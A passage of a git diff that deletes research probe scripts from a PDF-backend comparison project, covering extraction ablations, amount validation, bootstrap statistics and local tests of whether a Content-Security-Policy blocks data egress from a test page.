"118-s-4795/1_reported-in-senate", - "119-hr-1/1_reported-in-house", -] - - -def norm_label(s: str) -> str: - return " ".join((s or "").upper().replace(",", "").replace(".", "").split()) - - -def xml_heading_labels(xml: Path) -> set[str]: - v1 = normalize_bill(xml) - _, _, tree = build_xml_full_text(v1, v1) - flat, st = [], list(tree["v1"]) - while st: - n = st.pop() - flat.append(n) - st.extend(n.get("children") or []) - return { - norm_label(n.get("label")) - for n in flat - if n.get("level") in ("account", "agency", "heading") and n.get("label") - } - - -def f1(hit: int, n_cand: int, n_ref: int) -> float: - p = hit / n_cand if n_cand else 0.0 - r = hit / n_ref if n_ref else 0.0 - return 2 * p * r / (p + r) if (p + r) else 0.0 - - -def score(raw_pages, xml_tokens, xml_heads, repaired: bool) -> tuple[float, float]: - pages, _ = R.reconstruct(raw_pages, repaired=repaired) - toks = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, _ = align_to_body(xml_tokens, toks) - tf = token_f1(xml_tokens, aligned)["f1"] - anc = extract_anchors(pages) - P = {norm_label(a.text) for a in anc if a.kind in ("account", "agency", "grouping")} - hf = f1(len(P & xml_heads), len(P), len(xml_heads)) - return tf, hf - - -ABLATIONS = { - "baseline (as published, repaired)": {}, - "A: no repaired mode (strict)": {"repaired": False}, - "B: no upright filter": {"upright": False}, - "C: no size-based chrome rule": {"chrome_size": 0.0}, - "D: baseline tol 0.6 -> 2.0": {"tol": 2.0}, - "E: baseline tol 0.6 -> 0.1": {"tol": 0.1}, - "F: space factor 0.25 -> 0.4": {"space": 0.4}, - "G: no chrome regexes at all": {"chrome_pat": True}, -} - - -def apply(cfg: dict): - """Mutate the module's constants; returns a restore callable.""" - saved = (R._BASELINE_TOL, R._SPACE_FACTOR, R._CHROME_SIZE_RATIO, R._CHROME_PATTERNS, R.cluster_lines) - if "tol" in cfg: - R._BASELINE_TOL = cfg["tol"] - if "space" in cfg: - R._SPACE_FACTOR = cfg["space"] - if "chrome_size" in cfg: - R._CHROME_SIZE_RATIO = cfg["chrome_size"] - if cfg.get("chrome_pat"): - R._CHROME_PATTERNS = () - if cfg.get("upright") is False: - orig = R.cluster_lines - - def no_upright(page): - kept = [g for g in page.glyphs if g[R.SIZE] > R._SIZE_FLOOR] - saved_glyphs = page.glyphs - page.glyphs = kept - try: - # Re-run the real clustering but without the upright filter, by - # temporarily marking every glyph upright. - page.glyphs = [g[:8] + (True,) for g in kept] - return orig(page) - finally: - page.glyphs = saved_glyphs - - R.cluster_lines = no_upright - - def restore(): - ( - R._BASELINE_TOL, - R._SPACE_FACTOR, - R._CHROME_SIZE_RATIO, - R._CHROME_PATTERNS, - R.cluster_lines, - ) = saved - - return restore - - -def main() -> None: - cache: dict = {} - refs: dict = {} - for doc in DOCS: - bill, stem = doc.split("/") - pdf = REPO / f"tests/corpus/{bill}/{stem}.pdf" - xml = REPO / f"tests/corpus/{bill}/{stem}.xml" - refs[doc] = (xml_body_tokens(xml), xml_heading_labels(xml)) - for b in ALL_BACKENDS: - cache[(doc, b)] = run_backend(b, pdf)[0] - print(f" extracted {doc}", file=sys.stderr) - - out: dict = {} - for name, cfg in ABLATIONS.items(): - restore = apply(cfg) - rep = cfg.get("repaired", True) - try: - rows = {} - for b in ALL_BACKENDS: - tf, hf = [], [] - for doc in DOCS: - xt, xh = refs[doc] - a, c = score(cache[(doc, b)], xt, xh, rep) - tf.append(a) - hf.append(c) - rows[b] = (statistics.mean(tf), statistics.mean(hf)) - finally: - restore() - out[name] = rows - order = sorted(rows, key=lambda b: -(rows[b][0] + rows[b][1])) - print(f"\n{name}") - print(f" {'backend':<15} {'text_f1':>8} {'head_f1':>8} rank") - for i, b in enumerate(order, 1): - print(f" {b:<15} {rows[b][0]:>8.4f} {rows[b][1]:>8.4f} {i}") - - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_ablation.json" - dest.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {dest}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py b/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py deleted file mode 100644 index e5c86fa5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py +++ /dev/null @@ -1,141 +0,0 @@ -"""Red-team follow-up: does removing 'unsafe-inline' actually close the Speculation Rules bypass? - -This backs the corrected CSP that RESULTS.md recommends, and it exists as a file because -the first version was run from a scratch script that was then deleted -- leaving the -document's central security recommendation with no reproducible probe. - -THE VACUOUS-PASS TRAP THIS PROBE EXISTS TO AVOID. The obvious test is to serve the same -fixture under `script-src 'self'` and count bypasses. Run that way it reports **zero -bypasses** -- and also `completed=False, 0 vectors`, because the policy blocked the -fixture's own INLINE bootstrap script and nothing ever executed. A zero from a page that -did not run is indistinguishable from a zero from a page that ran and was contained. - -So the mitigation variants load their bootstrap from an EXTERNAL file, and every variant -asserts `completed=True` with the full vector count before its bypass list is believed. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -sys.path.insert(0, str(PROBES)) - -from redteam_egress2 import Server, run_case # noqa: E402 - -BASE = ( - "default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; " - "form-action 'none'; base-uri 'none'; object-src 'none'; frame-src 'none'; " - "worker-src 'none'" -) - -# `inline` variants keep the original bootstrap and are expected to be VOID under a -# policy that forbids inline script -- kept in the matrix precisely to demonstrate the -# false pass rather than to hide it. -VARIANTS = { - "published policy (script-src 'self' 'unsafe-inline')": ( - BASE + "; script-src 'self' 'unsafe-inline'", - "inline", - ), - "VOID CONTROL: script-src 'self', inline bootstrap": (BASE + "; script-src 'self'", "inline"), - "corrected policy (script-src 'self', external bootstrap)": ( - BASE + "; script-src 'self'", - "external", - ), -} - -INLINE_PAGE = """ - -
running
- - -""" - -EXTERNAL_PAGE = """ - -
running
- - -""" - -BOOT = 'window.__tryAll2("{tag}").then(function(r){{document.getElementById("o").textContent=r+"\\nDONE";}});' - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", - type=Path, - default=REPO / "docs/research/pdf-backend-bakeoff/results/redteam_csp_mitigation.json", - ) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "vectors2.js").write_text((PROBES / "vectors2.js").read_text()) - - results: dict = {"variants": {}} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - for i, (name, (csp, boot)) in enumerate(VARIANTS.items()): - tag = f"mit{i}" - page_file = fx / f"mitigation_{i}.html" - if boot == "external": - (fx / "boot_mitigation.js").write_text(BOOT.format(tag=tag)) - page_file.write_text(EXTERNAL_PAGE.format(csp=csp, tag=tag)) - else: - page_file.write_text(INLINE_PAGE.format(csp=csp, tag=tag)) - - r = run_case(browser, server, page_file) - bypasses = sorted({h.split("/")[-1].split("?")[0] for h in r["hits"] if "/" in h}) - # A run that did not execute its vectors proves nothing, whatever its - # bypass count. Say so rather than recording a zero. - valid = r["completed"] and r["n_vectors"] >= 19 - results["variants"][name] = { - "csp": csp, - "bootstrap": boot, - "completed": r["completed"], - "n_vectors_run": r["n_vectors"], - "VALID": valid, - "bypasses": bypasses if valid else None, - "note": None if valid else "VOID: vectors did not run; zero is meaningless", - } - print( - f"{name:<56} valid={valid!s:<5} vectors={r['n_vectors']:2d} " - f"bypasses={bypasses if valid else 'VOID'}", - flush=True, - ) - finally: - browser.close() - - v = results["variants"] - pub = v["published policy (script-src 'self' 'unsafe-inline')"] - fix = v["corrected policy (script-src 'self', external bootstrap)"] - results["conclusion"] = { - "published_policy_bypasses": pub["bypasses"], - "corrected_policy_bypasses": fix["bypasses"], - "speculation_rules_closed": bool( - pub["bypasses"] - and fix["bypasses"] is not None - and any("speculation" in b for b in pub["bypasses"]) - and not any("speculation" in b for b in fix["bypasses"]) - ), - "remaining_outside_csp": [b for b in (fix["bypasses"] or []) if "windowopen" in b], - } - print("\n" + json.dumps(results["conclusion"], indent=1)) - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py b/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py deleted file mode 100644 index bd84c4f2..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py +++ /dev/null @@ -1,158 +0,0 @@ -"""Red-team item 9: run the second-round vectors against the PROPOSED PRODUCTION POLICY. - -Same discipline as the first harness: a no-CSP control must be observed to leak before -any zero elsewhere counts, and the claim is decided by what the SERVER received. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py -""" - -from __future__ import annotations - -import argparse -import json -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -PORT = 8973 - -# The exact policy RESULTS.md proposes. -STRICT_CSP = ( - "default-src 'none'; script-src 'self' 'unsafe-inline'; style-src 'unsafe-inline'; " - "img-src data:; connect-src 'none'; form-action 'none'; base-uri 'none'; " - "object-src 'none'; frame-src 'none'; worker-src 'none'" -) - -PAGE = """{title} -{csp} -
running
- - -""" - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "400"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(60): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def hits(self, mark: int) -> list[str]: - return [x.strip() for x in self.lines[mark:] if "EGRESS OBSERVED" in x] - - -def run_case(browser, server, path: Path) -> dict: - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto(path.as_uri()) - report = "" - deadline = time.time() + 40 - while time.time() < deadline: - try: - report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - report = "" - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(4) - hits = server.hits(mark) - for p in ctx.pages: - try: - p.close() - except Exception: # noqa: BLE001 - pass - ctx.close() - return { - "completed": "DONE" in report, - "n_vectors": report.count(":attempted") + report.count(":threw"), - "hits": hits, - "page_report": report, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/redteam_egress2.json") - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "vectors2.js").write_text((PROBES / "vectors2.js").read_text()) - (fx / "rt2_nocsp.html").write_text(PAGE.format(title="rt2 no CSP", tag="rt2nocsp", csp="")) - (fx / "rt2_withcsp.html").write_text( - PAGE.format( - title="rt2 strict CSP", - tag="rt2csp", - csp=f'', - ) - ) - - results: dict = {"policy": STRICT_CSP} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - ctl = run_case(browser, server, fx / "rt2_nocsp.html") - results["no_csp_control"] = ctl - print( - f"no-CSP control : {len(ctl['hits'])} observed, " - f"{ctl['n_vectors']} vectors, completed={ctl['completed']}", - flush=True, - ) - strict = run_case(browser, server, fx / "rt2_withcsp.html") - results["strict_csp"] = strict - print( - f"strict CSP : {len(strict['hits'])} observed, " - f"{strict['n_vectors']} vectors, completed={strict['completed']}", - flush=True, - ) - finally: - browser.close() - - def names(hits): - return sorted({h.split("/")[-1].split("?")[0] for h in hits if "/" in h}) - - results["control_vectors_that_leaked"] = names(results["no_csp_control"]["hits"]) - results["POLICY_BYPASSES"] = names(results["strict_csp"]["hits"]) - print("\ncontrol leaked :", results["control_vectors_that_leaked"]) - print("POLICY BYPASSES:", results["POLICY_BYPASSES"] or "none") - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py b/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py deleted file mode 100644 index 1cfebf9f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py +++ /dev/null @@ -1,85 +0,0 @@ -"""Red-team: score the two pairs the production guard declines, WITHOUT the guard. - -The published Phase 2 table is 13 of 15 pairs. Excluding pairs after seeing results is -exactly the kind of move that can manufacture a parity result, so the excluded pairs are -scored here explicitly and reported alongside, rather than only argued about. - -If PDFium-WASM's parity with the incumbent holds on the declined pairs too, the exclusion -cannot be what produced it. -""" - -from __future__ import annotations - -import json -import sys -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import amount_triples, change_signatures, prf, xml_canonical # noqa: E402 - -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -DECLINED = [ - ("115-hr-5895", "4_engrossed-amendment-senate", "5_enrolled-bill"), - ("118-hr-4366", "5_engrossed-amendment-house", "6_enrolled-bill"), -] - - -def main() -> None: - out: dict = {"note": "guard DISABLED; these are the pairs production declines", "pairs": {}} - for bill, a, b in DECLINED: - key = f"{bill}/{a}->{b}" - out["pairs"][key] = {} - xml_canon = xml_canonical(REPO / f"tests/corpus/{bill}/{a}.xml", REPO / f"tests/corpus/{bill}/{b}.xml") - inc = None - for backend in [b_ for b_ in ALL_BACKENDS]: - try: - pages = {} - for side, stem in (("v1", a), ("v2", b)): - raw, _ = run_backend(backend, REPO / f"tests/corpus/{bill}/{stem}.pdf") - pages[side], _ = reconstruct(raw, repaired=True) - diff = diff_pdfs(pages["v1"], pages["v2"]) # NO GUARD, deliberately - t1, o1 = pdf_full_text(pages["v1"]) - t2, o2 = pdf_full_text(pages["v2"]) - congress, chamber, number = bill.split("-") - canon = pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - if backend == "pdfium-native": - inc = canon - entry = { - "vs_xml_amounts": prf(amount_triples(xml_canon), amount_triples(canon)), - "n_changes": len(canon.get("changes") or []), - } - if inc is not None and backend != "pdfium-native": - entry["identical_amounts"] = amount_triples(inc) == amount_triples(canon) - entry["identical_changes"] = change_signatures(inc) == change_signatures(canon) - entry["vs_incumbent_amounts"] = prf(amount_triples(inc), amount_triples(canon)) - out["pairs"][key][backend] = entry - print(f" {key:<40} {backend:<15} {json.dumps(entry)[:150]}", flush=True) - except Exception as exc: - out["pairs"][key][backend] = {"error": f"{type(exc).__name__}: {exc}"} - print(f" {key:<40} {backend:<15} ERROR {exc}", flush=True) - traceback.print_exc() - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_unguarded.json" - dest.write_text(json.dumps(out, indent=1, default=str)) - print(f"wrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py b/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py deleted file mode 100644 index 7b16e6c8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py +++ /dev/null @@ -1,148 +0,0 @@ -"""Red-team item 7: separate "identical to the incumbent" from "correct". - -PDFium-WASM reproducing pypdfium2 exactly says nothing about whether either is RIGHT. -If the incumbent mis-reads an amount, its WASM twin mis-reads it identically and the -parity metric records a perfect score. - -So a random sample of the PDF-derived amount entries is validated against the source -document through a path that shares NOTHING with the pipeline under test: - - * text comes from PyMuPDF's own `get_text()` -- a different library, its own text - assembly, not the neutral glyph layer; - * the check is that the claimed old value appears on the v1 page and the claimed new - value on the v2 page, at the location the canonical diff points to. - -A failure here is a real accuracy defect. A pass does not prove the diff is semantically -right, only that the numbers it reports are numbers actually printed in the documents. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py -""" - -from __future__ import annotations - -import json -import random -import re -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import pdf_canonical # noqa: E402 - -SEED = 20260805 # fixed so the sample is reproducible - - -def independent_text(pdf: Path) -> str: - """Whole-document text via PyMuPDF's OWN api -- not the neutral layer under test.""" - import pymupdf - - doc = pymupdf.open(str(pdf)) - try: - return "\n".join(doc[i].get_text() for i in range(doc.page_count)) - finally: - doc.close() - - -def variants(amount: str) -> list[str]: - """Surface forms the same amount can take in printed GPO text. - - The canonical contract stores amounts as INTEGERS (194000000) while the page prints - "$194,000,000". A first version of this check compared the integer against raw page - text and reported 0/43 -- a check structurally incapable of matching, which looks - exactly like a catastrophic accuracy failure. Both sides are stripped of $ and commas - instead. - """ - a = str(amount).strip().replace("$", "").replace(",", "") - return [a] if a else [] - - -def strip_money(text: str) -> str: - """Remove $ and thousands separators so integer amounts can be found literally.""" - return re.sub(r"[,$]", "", text) - - -def main() -> None: - pair = ("118-hr-4366", "3_placed-on-calendar-senate", "4_engrossed-amendment-senate") - bill, a, b = pair - p1 = REPO / f"tests/corpus/{bill}/{a}.pdf" - p2 = REPO / f"tests/corpus/{bill}/{b}.pdf" - - print(f"pair: {bill}/{a} -> {b}", flush=True) - canon, _ = pdf_canonical("pdfium-wasm", p1, p2, bill, "repaired") - - entries = [] - for ch in canon.get("changes") or []: - for e in ch.get("amount_entries") or []: - entries.append(e) - print(f"PDFium-WASM produced {len(entries)} amount entries", flush=True) - - rng = random.Random(SEED) - sample = rng.sample(entries, min(40, len(entries))) - - print("building independent reference text via PyMuPDF get_text() ...", flush=True) - t1 = independent_text(p1) - t2 = independent_text(p2) - # GPO prints amounts with commas; normalize whitespace only. - t1n = strip_money(re.sub(r"\s+", " ", t1)) - t2n = strip_money(re.sub(r"\s+", " ", t2)) - - ok_old = ok_new = 0 - n_old = n_new = 0 - failures = [] - for e in sample: - old, new, kind = e.get("old"), e.get("new"), e.get("kind") - if old: - n_old += 1 - hit = any(v in t1n for v in variants(str(old))) - ok_old += hit - if not hit: - failures.append(("old-not-in-v1", kind, old, new)) - if new: - n_new += 1 - hit = any(v in t2n for v in variants(str(new))) - ok_new += hit - if not hit: - failures.append(("new-not-in-v2", kind, old, new)) - - print() - print(f"sample n={len(sample)} entries (seed {SEED})") - print(f" claimed OLD value found in v1 source text: {ok_old}/{n_old}") - print(f" claimed NEW value found in v2 source text: {ok_new}/{n_new}") - if failures: - print(f" FAILURES ({len(failures)}):") - for f in failures[:12]: - print(" ", f) - else: - print(" no failures: every sampled amount is genuinely printed in the source side it is claimed for") - - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_amount_validation.json" - dest.write_text( - json.dumps( - { - "pair": f"{bill}/{a}->{b}", - "seed": SEED, - "n_entries_total": len(entries), - "n_sampled": len(sample), - "old_found": ok_old, - "old_checked": n_old, - "new_found": ok_new, - "new_checked": n_new, - "failures": failures, - "reference": "PyMuPDF get_text(), independent of the neutral glyph layer", - }, - indent=1, - default=str, - ) - ) - print(f"wrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py deleted file mode 100644 index fb6d5306..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py +++ /dev/null @@ -1,351 +0,0 @@ -"""Concern B statistics: paired cluster bootstrap by bill, thresholds, and the B0 rows. - -PRE-REGISTRATION-CONFIRMATORY.md, "Statistics: paired cluster bootstrap by bill" and -"Practical-effect thresholds". - - Delta = score(pdfminer) - score(pdfium-wasm), paired per document, defined once here and - never inverted. Positive Delta favours pdfminer. - - Resampling unit is the BILL, with replacement, all of a sampled bill's documents - travelling together. The statistic is the per-bill mean of the paired per-document - Delta, then the unweighted mean over sampled bills, so one 6-document bill cannot - dominate 30 clusters. Document-weighted aggregation is reported as a sensitivity check. - - A backend LEADS only if the 95% CI excludes zero AND |Delta| reaches the metric's - practical threshold. Overlapping independent CIs are not evidence and are not computed. - -A metric whose deciding sabotage does not move it past its own threshold is VOID: its -Delta is printed but marked, and it may not be cited as evidence. That check runs first, -because a Delta table without its B0 row is not reviewable. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py \ - --results docs/research/pdf-backend-bakeoff/results/confirm_p1.json -""" - -from __future__ import annotations - -import argparse -import json -import random -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_sabotage as SAB # noqa: E402 - -SEED = 20260805 -RESAMPLES = 10_000 - -# Frozen before any confirmatory result was visible. See the preregistration for the -# per-metric justification; these are not tunable here. -THRESHOLDS = {"B1": 0.010, "B2": 0.020, "B3a": 0.005, "B5": 0.010, "B6": 0.020} - -# (metric -> how to pull its scalar out of a scored document) -FIELD = { - "B1": ("B1", "f1"), - "B2": ("B2", "f1"), - "B3a": ("B3a", "score"), - "B5": ("B5", "f1"), - "B6": ("B6", "accuracy"), -} - -CANDIDATES = ("pdfium-wasm", "pdfminer") - - -def scalar(doc_results: dict, backend: str, mode: str, metric: str) -> float | None: - entry = doc_results.get(backend, {}).get(mode) - if not entry or "error" in entry: - return None - block, field = FIELD[metric] - val = entry.get(block, {}).get(field) - return None if val is None else float(val) - - -def paired_deltas(docs: dict, mode: str, metric: str, keys: list[str]) -> dict[str, list[float]]: - """{bill: [per-document Delta]} for documents where BOTH candidates scored.""" - by_bill: dict[str, list[float]] = {} - for key in keys: - entry = docs[key] - res = entry.get("results") or {} - a = scalar(res, "pdfminer", mode, metric) - b = scalar(res, "pdfium-wasm", mode, metric) - if a is None or b is None: - continue - by_bill.setdefault(entry["bill"], []).append(a - b) - return by_bill - - -def cluster_bootstrap(by_bill: dict[str, list[float]]) -> dict: - bills = sorted(by_bill) - if len(bills) < 2: - return {"point": None, "ci": None, "n_bills": len(bills), "n_documents": sum(len(v) for v in by_bill.values())} - per_bill = {b: statistics.mean(by_bill[b]) for b in bills} - point = statistics.mean(per_bill[b] for b in bills) - - rng = random.Random(SEED) - draws = [] - n = len(bills) - for _ in range(RESAMPLES): - sample = [per_bill[bills[rng.randrange(n)]] for _ in range(n)] - draws.append(sum(sample) / n) - draws.sort() - lo = draws[int(0.025 * RESAMPLES)] - hi = draws[int(0.975 * RESAMPLES) - 1] - - flat = [d for v in by_bill.values() for d in v] - n_differing = sum(1 for d in flat if abs(d) > 1e-9) - return { - "point": round(point, 5), - "ci": [round(lo, 5), round(hi, 5)], - "excludes_zero": bool(lo > 0 or hi < 0), - "n_bills": n, - "n_documents": len(flat), - "n_documents_differing": n_differing, - # A [0, 0] interval means NO DOCUMENT DIFFERED, which is a different statement from - # "the differences cancelled out" and must not be read as the latter. Where it also - # holds that every document capable of differing was excluded by a stratum rule, the - # metric had no chance to discriminate and "indistinguishable" is not evidence of - # similarity -- see the B2 note in RESULTS-CONFIRMATORY.md. - "degenerate_all_zero": n_differing == 0, - "doc_weighted_point": round(statistics.mean(flat), 5), - } - - -def verdict(stat: dict, metric: str, void: bool) -> str: - if void: - return "VOID (control did not fire)" - if stat["point"] is None: - return "insufficient data" - th = THRESHOLDS[metric] - sig = stat["excludes_zero"] - prac = abs(stat["point"]) >= th - who = "pdfminer" if stat["point"] > 0 else "pdfium-wasm" - if sig and prac: - return f"{who} LEADS" - if sig and not prac: - return "statistically distinguishable, practically indistinguishable" - if not sig and prac: - return "practically large but CI includes zero -- not established" - if stat.get("degenerate_all_zero"): - return "identical on every document (not merely indistinguishable)" - return "indistinguishable" - - -def b0_rows(docs: dict, mode: str, keys: list[str]) -> dict: - """Did each deciding control move its own metric past that metric's threshold?""" - out = {} - for metric, sid in SAB.DECIDING.items(): - deltas, others = [], [] - for key in keys: - res = docs[key].get("results") or {} - base = scalar(res, "pdfium-wasm", mode, metric) - sab = scalar(res, sid, mode, metric) - if base is None or sab is None: - continue - deltas.append(base - sab) - b2b = scalar(res, "pdfium-wasm", mode, "B2") - b2s = scalar(res, sid, mode, "B2") - if b2b is not None and b2s is not None: - others.append(b2b - b2s) - if not deltas: - out[metric] = {"control": sid, "delta": None, "fires": False, "n": 0} - continue - d = statistics.mean(deltas) - out[metric] = { - "control": sid, - "delta": round(d, 5), - "threshold": THRESHOLDS[metric], - "fires": bool(d >= THRESHOLDS[metric]), - "n": len(deltas), - "b2_delta": round(statistics.mean(others), 5) if others else None, - } - return out - - -def separability(docs: dict, mode: str, keys: list[str]) -> list[dict]: - rows = [] - for sid, own_m, other_m, rule, lim in SAB.SEPARABILITY: - own, other = [], [] - for key in keys: - res = docs[key].get("results") or {} - for metric, acc in ((own_m, own), (other_m, other)): - b = scalar(res, "pdfium-wasm", mode, metric) - s = scalar(res, sid, mode, metric) - if b is not None and s is not None: - acc.append(b - s) - if not own or not other: - rows.append({"control": sid, "verdict": "insufficient data"}) - continue - a, o = statistics.mean(own), statistics.mean(other) - ok = (o < lim) if rule == "threshold" else (o < a) - rows.append( - { - "control": sid, - "own_metric": own_m, - "own_delta": round(a, 5), - "other_metric": other_m, - "other_delta": round(o, 5), - "rule": rule, - "limit": lim, - "verdict": "SEPARABLE" if ok else "NOT SEPARABLE", - } - ) - return rows - - -def repair_delta(docs: dict, keys: list[str]) -> dict: - out = {} - for backend in CANDIDATES: - vals = [] - for key in keys: - res = docs[key].get("results") or {} - s = scalar(res, backend, "strict", "B1") - r = scalar(res, backend, "repaired", "B1") - if s is not None and r is not None: - vals.append(r - s) - out[backend] = round(statistics.mean(vals), 5) if vals else None - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="strict", choices=("strict", "repaired")) - ap.add_argument("--out", type=Path, default=None) - args = ap.parse_args() - - raw = json.loads(args.results.read_text()) - docs = raw["documents"] - pop = raw["population"] - - def accepted(key: str) -> bool: - res = docs[key].get("results") or {} - return res.get("pdfium-wasm", {}).get("production_accepted") is True - - strata = { - "primary (production-accepted)": [k for k in docs if accepted(k)], - "production-declined": [k for k in docs if not accepted(k)], - } - qb = [k for k in docs if docs[k].get("quoted_block")] - strata["primary, quoted-block-free (B2/B5/B6)"] = [ - k for k in strata["primary (production-accepted)"] if k not in qb - ] - strata["primary, quoted-block (B2/B5/B6)"] = [k for k in strata["primary (production-accepted)"] if k in qb] - - report = { - "population": pop, - "source": str(args.results.name), - "mode": args.mode, - "seed": SEED, - "resamples": RESAMPLES, - "delta_definition": "score(pdfminer) - score(pdfium-wasm); positive favours pdfminer", - "n_documents": len(docs), - "strata_sizes": {k: len(v) for k, v in strata.items()}, - } - - primary = strata["primary (production-accepted)"] - report["B0"] = b0_rows(docs, args.mode, primary) - report["separability"] = separability(docs, args.mode, primary) - report["repair_delta_B1"] = repair_delta(docs, primary) - - results = {} - for metric in FIELD: - keys = strata["primary, quoted-block-free (B2/B5/B6)"] if metric in ("B2", "B5", "B6") else primary - stat = cluster_bootstrap(paired_deltas(docs, args.mode, metric, keys)) - void = not report["B0"].get(metric, {}).get("fires", False) - stat["verdict"] = verdict(stat, metric, void) - stat["threshold"] = THRESHOLDS[metric] - stat["stratum"] = "quoted-block-free" if metric in ("B2", "B5", "B6") else "production-accepted" - results[metric] = stat - report["delta"] = results - - # The quoted-block stratum for B2/B5/B6, reported because the primary stratum is - # known to be non-discriminating on this corpus: every P1 document where the two - # backends' heading recovery differs carries , and the exclusion that - # protects B2 from the DeltaTrack#11 reference defect removes all of them. Publishing - # only "identical on every document" would read as evidence of similarity when the - # metric in fact had no opportunity to fire. - secondary = {} - for metric in ("B2", "B5", "B6"): - keys = strata["primary, quoted-block (B2/B5/B6)"] - stat = cluster_bootstrap(paired_deltas(docs, args.mode, metric, keys)) - stat["threshold"] = THRESHOLDS[metric] - stat["stratum"] = "quoted-block (XML reference carries a known parser drop)" - stat["caveat"] = ( - "The XML reference under-reports here (DeltaTrack#11), so this is not a clean " - "accuracy comparison. It is reported because the clean stratum cannot discriminate." - ) - secondary[metric] = stat - report["delta_quoted_block_stratum"] = secondary - - # Absolute per-backend means, for context. Never a ranking on their own. - means = {} - for backend in CANDIDATES + ("pdfium-native",): - means[backend] = {} - for metric in FIELD: - keys = strata["primary, quoted-block-free (B2/B5/B6)"] if metric in ("B2", "B5", "B6") else primary - vals = [scalar(docs[k].get("results") or {}, backend, args.mode, metric) for k in keys] - vals = [v for v in vals if v is not None] - means[backend][metric] = round(statistics.mean(vals), 5) if vals else None - report["means"] = means - - print(f"\n=== {pop.upper()} / {args.mode} mode ===") - print(f"documents {len(docs)} strata: " + ", ".join(f"{k}={len(v)}" for k, v in strata.items())) - - print("\nB0 -- did each control fire?") - 